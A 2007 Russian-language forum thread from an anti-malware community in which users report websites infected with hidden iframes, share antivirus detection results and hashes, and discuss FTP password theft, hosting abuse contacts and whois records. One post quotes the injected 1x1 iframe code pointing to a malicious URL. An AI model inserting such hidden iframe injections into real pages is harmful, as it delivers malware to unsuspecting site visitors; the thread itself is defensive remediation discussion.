-
Сообщение от
5ergi0
У меня похожая ситуация, детектится вирь на сайте, владельцы говорят, что все нормально. На вирустотале семеро его видят.
Скрипт я выдернул с сайта, он приложен.
ЛК: чисто, AVIRA: ложный детект - убрали.
Опыт — это слово, которым люди называют свои ошибки.
-
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Junior Member
- Вес репутации
- 63
Скажите, каким образом происходит внедрение гадости на сайт? Дело в том, что во все страницы на моем сайте, которые называются default.htm было вписано в конце:
echo "";echo "";<iframe src="hxxp://www.radiodeejay.hr/forum/lang/inexed.htm" width=1 height=1></iframe>
Фокс от этого вис, а те, кто юзают IE говорили, что цепляли троян. Если бы не это echo "";echo ""; я бы может и не заметил так сразу. Я, конечно, снес эту строчку, но как это было сделано? Если вставили раз, смогут и второй при желании, ведь дыра-то осталась?
-
Visiting Helper
- Вес репутации
- 67
Как вариант, украдены пароли на ftp...
-
-
Сообщение от
M@xWell
Как узнать их хостер, провайдерa и регистраторa? Я этот сайт в поисковике нашел (чтоб проверить пришлось даже второй раз искать. т.к. ссылку не сохранил...). Соответственно никакой инфы нету, кроме самого сайта..
Сайт с заразой:
pizzamaximus.com
Отчет KIS:
обнаружено: троянская программа Trojan-Clicker.HTML.IFrame.a URL:
traffmanager.org/tds/iframe.php
ЗЫ: Еще решил вести с ними борьбу: буду писать на разные целенаправленные форумы о них.. Пусть о них люди знают>
Факт наличия вредоноса подтверждаю.
Делаю всё от меня зависящее.
Добавлено через 11 минут
Сообщение от
5ergi0
Как вариант, украдены пароли на ftp...
Атаки начинаются с открытой публикации e-mail - Как вариант...
Важное правило: НИКОГДА НЕ ПУБЛИКУЙТЕ СВОЙ E-MAIL ТАК, ЧТОБЫ МОШЕННИК ЗНАЛ О НЁМ!
Используйте форму обратной связи - этим вы огородите себя от чужого злого умысла.
Добавлено через 5 минут
Сообщение от
SuperBrat
ЛК: чисто, AVIRA: ложный детект - убрали.
KIS 7 - уже визжит....
Судя по их записи, детект - свежий!
Последний раз редактировалось Shark; 30.07.2007 в 09:42.
Причина: Добавлено Сообщение
-
Shark, я отвечал на http://virusinfo.info/showpost.php?p=124203&postcount=5
А вы о чем? Там ЛК, AVIRA и др. признали ложный детект или чистоту образца.
Несогласные:
File 111.txt received on 07.30.2007 09:05:19 (CET)
Antivirus Version Last Update Result
CAT-QuickHeal 9.00 2007.07.28 JS_/Seeker
Fortinet 2.91.0.0 2007.07.30 JS/Inor.A!tr.dldr
Ikarus T3.1.1.8 2007.07.30 Trojan-Downloader.JS.Inor.A
Norman 5.80.02 2007.07.27 JS/Exploit_based.D
VBA32 3.12.2.1 2007.07.30 Trojan-Downloader.JS.Psyme.cv
Additional information
File size: 2738 bytes
MD5: 8d4ba06269770f80227f81332e06cfcb
SHA1: 47647815d32104b5e555b97a39f4622c8531dcfd
Опыт — это слово, которым люди называют свои ошибки.
-
-
Последний раз редактировалось Shu_b; 30.07.2007 в 12:49.
Причина: Добавлено сообщение
-
2Shark я ж в личку отписывал... ну ниче.. не думаю, чтоб они полезли в УК проверять, что означает ст.272 ))))) за ссылку спасибо - интересно почитать.. На сайте пицерии действительно контакты и в столице, и в Севастополе..
ЗЫ: Ого.. ниасилил... оказывается про этот сайт уже известно.. а я думал, велосипед покажу .. а Флетчер/Флечер с его сайтом GST жжут !
Последний раз редактировалось M@xWell; 30.07.2007 в 19:07.
-
Junior Member
- Вес репутации
- 62
пишите сюда лучше
http://mirohost.net/contact.phtml
т.к они у них
3.147.178.193.in-addr.arpa IN PTR hostingalexa.mirohost.net 86400s (1.00:00:00)
-
2 i_am отправил. посмотрим, что ответят (если ответят)
-
aa
Интересно, почему whois не может определить адрес и улицу владельца,
а вместо этого пишет белиберду.Как такое возможно???
-
-
Junior Member
- Вес репутации
- 62
Это не вхуис не может определить, а была введена заранее fake информация. Кстати по правилам ICANN если подать абузу такой домен будет заблокирован, в случае, если владелец в течении 15 дней не изменит информацию на корректную. Посему можно написать и в imena.com.ua и пригрозить пожаловаться в ИКАНН если не примут меры. Сработает. Естдомаинс очень быстро, например, на это реагирует
кстати исходя из whois history было 2 варианта
Whois History: 2 records have been archived since 2007-06-15
к сожалению посмотреть инфу по старому вхуису сейчас не могу, т.к нет подписки на этот сервис. Может в ближайшее время продлю и скажу
-
Получил ответ:
Проверили, на сайте троянов не нашли, но может владельцы перезалили сайт.
Добавка iframe - с ссылкой на вирусы - частое явление, так что вполне может быть.
Зашел на сайт - действительно уже ниче не подгружается. Значит, все таки "мотивация" помогла)